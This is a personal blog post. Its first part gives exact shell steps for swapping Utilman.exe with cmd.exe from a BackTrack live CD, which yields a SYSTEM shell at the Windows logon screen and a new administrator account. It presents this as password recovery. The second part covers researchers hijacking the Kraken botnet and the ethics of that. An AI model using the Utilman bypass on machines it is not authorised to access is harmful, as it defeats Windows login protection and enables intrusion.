PaulSpoerry.com

Why hack Windows passwords when you can simply create yourself a new Administrator account?

In a previous post I showed how you can use an Ophcrack Live CD to crack Windows passwords in minutes. It works, I’ve done it before and it really works. The free, open source Ophcrack Live CD is a Windows account password cracking tool designed to help you recover lost Windows passwords. Quite a few people have sent me emails or chatted me via my website saying “I forgot my password”, or “my kid locked himself out of his pc”. I’m unsure if that’s really the case or if they were just looking for a way to crack Windows passwords. However, if that is really the case there is potentially a much faster way to resolve your issue… just create a new Administrator account!

To create a new Administrator account you’ll want to grab a copy of the Offensive Security’s BackTrack Live CD which can be found here.

What is BackTrack?

BackTrack is the result of the merging of two Innovative Penetration Testing live Linux distributions - Whax and Auditor. BackTrack has been dubbed as the best Security Live CD today, and has been rated 1st in its category, and 32nd overall in Insecure.org. Based on SLAX (Slackware), BackTrack provides user modularity. This means the distribution can be easily customised by the user to include personal scripts, additional tools, customized kernels, etc.

BackTrack Terminal Window

Here’s a quick and dirty way to make a new user account.

Boot into Backtrack and open a shell prompt:

• cd /mnt (change directory to mounted drives)

• ls (get the list of mounted drives)

• cd sda1 (sda1 is the main hard drive)

• cd Windows/ (change to the windows directory)

• cd System32/ (change to the system directory)

• mv Utilman.exe Utilman.old (backup original file)

• cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)

• reboot

Once rebooted, at vista logon screen do the following:

• Press Windows key + U

• To invoke Utility Manager ( A.K.A. CMD.exe)

• Cmd.exe will spawn with ‘System’ privileges.

• c:\>net user S00perAdmin mypassword /add

• c:\>net localgroup administrators S00perAdmin /add

• Reboot and log in with your newly added Admin account

There ya go… now instead of needing to “crack” you “lost” password you can simply create a new Administrator account, login with that and then change the lost accounts password to what you want it to be.

Researchers at TippingPoint Technologies’ Digital Vaccine Laboratories have found a way to infiltrate and seize control of one of the world’s largest spam-spewing botnets. By reverse engineering the encryption they have successfully cracked into the botnet. They basically have the ability to create a fake Kraken server capable of overtaking a redirected zombie.

Essentially, TippingPoint can now overtake the infected system and cause it to connect to TippingPoint’s fake Kraken server and receive a command to kill the target process handing the communication. In other words, they CAN stop the spam spewing from these machines. The catch is, they would be sending remote commands to someone’s computer without their knowledge which has caused an ethical dilemma. If they send the commands and stop the spam they are basically hacking the infected computer to do something the end user doesn’t know about.

Personally, I say they send the commands… the computers are already infected. I can however see the issue they have, nobody wants their machine doing anything without their permission. They don’t want to be as bad as the bad guys.

Read more on the issue at eWeek.